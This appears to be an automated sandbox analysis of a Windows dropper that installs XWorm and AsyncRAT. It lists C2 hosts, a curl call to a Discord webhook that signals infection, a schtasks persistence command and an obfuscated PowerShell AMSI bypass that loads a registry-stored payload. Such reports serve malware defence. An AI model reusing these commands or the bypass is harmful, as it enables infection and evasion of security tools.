Analysis
-
max time kernel
5s -
max time network
7s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
22-06-2024 05:28
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240221-en
Errors
General
-
Target
Dropper.exe
-
Size
1.4MB
-
MD5
afbd173e05ef8ddabbe10b90f93b6614
-
SHA1
718220c153e1eba3d978eb7d2eb884716797be9f
-
SHA256
9d89f838ab73933fc7a35b409e022dbb33e11c94c306ecfe9710e8ed3a82946e
-
SHA512
5d4f4dcbdf4acbdd84c3da5a8351ff5db0c5091dcb94eb6dfb7b019e0ba342bf74e0bd3eb5b4484e6247561e7325be90e8433ee42137e6cf56fc1d76f29eb31f
-
SSDEEP
12288:C0w1hc0h3LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:CCmwDRPjwuB
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe family_xworm behavioral2/memory/3320-65-0x0000000000A80000-0x0000000000A92000-memory.dmp family_xworm -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Dropper.exe$77-aachost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation Dropper.exe Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation $77-aachost.exe -
Executes dropped EXE 4 IoCs
Processes:
$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-install.exepid process 3320 $77-sdchost.exe 4984 $77-aachost.exe 756 $77-penisballs.exe 1724 $77-install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 2 IoCs
Processes:
powershell.EXEdescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE -
Modifies registry class 1 IoCs
Processes:
Dropper.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Dropper.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.EXE$77-aachost.exe$77-penisballs.exepid process 4528 powershell.EXE 4528 powershell.EXE 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 4984 $77-aachost.exe 756 $77-penisballs.exe 756 $77-penisballs.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exepowershell.EXE$77-aachost.exedescription pid process Token: SeDebugPrivilege 3320 $77-sdchost.exe Token: SeDebugPrivilege 756 $77-penisballs.exe Token: SeDebugPrivilege 4528 powershell.EXE Token: SeDebugPrivilege 4984 $77-aachost.exe Token: SeDebugPrivilege 4984 $77-aachost.exe Token: SeShutdownPrivilege 4984 $77-aachost.exe Token: SeDebugPrivilege 4528 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$77-penisballs.exepid process 756 $77-penisballs.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
Dropper.execmd.exe$77-aachost.execmd.exedescription pid process target process PID 2144 wrote to memory of 1488 2144 Dropper.exe cmd.exe PID 2144 wrote to memory of 1488 2144 Dropper.exe cmd.exe PID 2144 wrote to memory of 1488 2144 Dropper.exe cmd.exe PID 1488 wrote to memory of 540 1488 cmd.exe curl.exe PID 1488 wrote to memory of 540 1488 cmd.exe curl.exe PID 1488 wrote to memory of 540 1488 cmd.exe curl.exe PID 2144 wrote to memory of 3320 2144 Dropper.exe $77-sdchost.exe PID 2144 wrote to memory of 3320 2144 Dropper.exe $77-sdchost.exe PID 2144 wrote to memory of 4984 2144 Dropper.exe $77-aachost.exe PID 2144 wrote to memory of 4984 2144 Dropper.exe $77-aachost.exe PID 2144 wrote to memory of 756 2144 Dropper.exe $77-penisballs.exe PID 2144 wrote to memory of 756 2144 Dropper.exe $77-penisballs.exe PID 2144 wrote to memory of 1724 2144 Dropper.exe $77-install.exe PID 2144 wrote to memory of 1724 2144 Dropper.exe $77-install.exe PID 2144 wrote to memory of 1724 2144 Dropper.exe $77-install.exe PID 4984 wrote to memory of 4028 4984 $77-aachost.exe cmd.exe PID 4984 wrote to memory of 4028 4984 $77-aachost.exe cmd.exe PID 4028 wrote to memory of 4196 4028 cmd.exe schtasks.exe PID 4028 wrote to memory of 4196 4028 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cGMeUGbQwrUv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XodSWkjyDnBiia,[Parameter(Position=1)][Type]$PAOuipoSxq)$aTHgdegoXPd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+'ect'+[Char](101)+'dD'+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+'y'+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'Sea'+'l'+''+'e'+'d'+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+'l'+'a'+'s'+'s',[MulticastDelegate]);$aTHgdegoXPd.DefineConstructor('RTS'+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'P'+''+'u'+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XodSWkjyDnBiia).SetImplementationFlags(''+[Char](82)+'un'+'t'+''+'i'+''+[Char](109)+'e'+','+''+[Char](77)+''+'a'+'na'+[Char](103)+'e'+[Char](100)+'');$aTHgdegoXPd.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+'c'+','+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$PAOuipoSxq,$XodSWkjyDnBiia).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $aTHgdegoXPd.CreateType();}$yyojQTtxCfSnI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.dl'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+'ro'+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+'n'+'3'+''+'2'+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'hod'+'s'+'');$mrTAGOxMImyDmj=$yyojQTtxCfSnI.GetMethod(''+[Char](71)+'et'+'P'+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JaCeBBsAfsErqPBefOq=cGMeUGbQwrUv @([String])([IntPtr]);$UiEkmYxvdURwPmuJIbXHnK=cGMeUGbQwrUv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eMjwxkfWWoA=$yyojQTtxCfSnI.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+'ul'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('kern'+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$linFdlzdfFGtts=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$eMjwxkfWWoA,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+'ryA')));$MLgpJhmpOvyryFfje=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$eMjwxkfWWoA,[Object]('V'+[Char](105)+'r'+'t'+''+[Char](117)+'al'+'P'+'r'+[Char](111)+'te'+'c'+'t')));$SzYSnFW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($linFdlzdfFGtts,$JaCeBBsAfsErqPBefOq).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$igBeVBuvnHTmziqrM=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$SzYSnFW,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+'u'+''+'f'+'f'+'e'+'r')));$COqrNkTiDi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MLgpJhmpOvyryFfje,$UiEkmYxvdURwPmuJIbXHnK).Invoke($igBeVBuvnHTmziqrM,[uint32]8,4,[ref]$COqrNkTiDi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$igBeVBuvnHTmziqrM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MLgpJhmpOvyryFfje,$UiEkmYxvdURwPmuJIbXHnK).Invoke($igBeVBuvnHTmziqrM,[uint32]8,0x20,[ref]$COqrNkTiDi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5499861c56b2368cb123c027336370b92
SHA1c018376876cc5906681502bdc4c313e9ce4bd6ad
SHA256146a6db11db984e114e8942aa9a684f3c33c8348029cc1406754f134adbb3930
SHA512c585a7e0cf0c860863699a13ae6843babbf13b13246715e9ae5ba8296b4037ee839c09b3648250c6a3687ee01e2ad5a65ebc77aabd42bd3ad7398d6b57f9e077
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
50KB
MD577a71f3a441aa3bf824967e52413bec5
SHA1c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA2561e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA51231c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
C:\Windows\Temp\__PSScriptPolicyTest_g3hgnhhh.oug.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/756-188-0x0000000000F50000-0x0000000000F96000-memory.dmpFilesize
280KB
-
memory/756-216-0x0000000002EF0000-0x0000000002EF6000-memory.dmpFilesize
24KB
-
memory/2144-1-0x0000000000480000-0x00000000005F0000-memory.dmpFilesize
1.4MB
-
memory/2144-0-0x00000000744DE000-0x00000000744DF000-memory.dmpFilesize
4KB
-
memory/3320-65-0x0000000000A80000-0x0000000000A92000-memory.dmpFilesize
72KB
-
memory/3320-64-0x00007FFFFA653000-0x00007FFFFA655000-memory.dmpFilesize
8KB
-
memory/4528-222-0x000001F4B48E0000-0x000001F4B4902000-memory.dmpFilesize
136KB
-
memory/4528-231-0x000001F4B4C80000-0x000001F4B4CAA000-memory.dmpFilesize
168KB
-
memory/4528-232-0x00007FF8195D0000-0x00007FF8197C5000-memory.dmpFilesize
2.0MB
-
memory/4528-233-0x00007FF819190000-0x00007FF81924E000-memory.dmpFilesize
760KB
-
memory/4528-234-0x00007FF643530000-0x00007FF6435A1000-memory.dmpFilesize
452KB
-
memory/4984-127-0x0000000000600000-0x0000000000616000-memory.dmpFilesize
88KB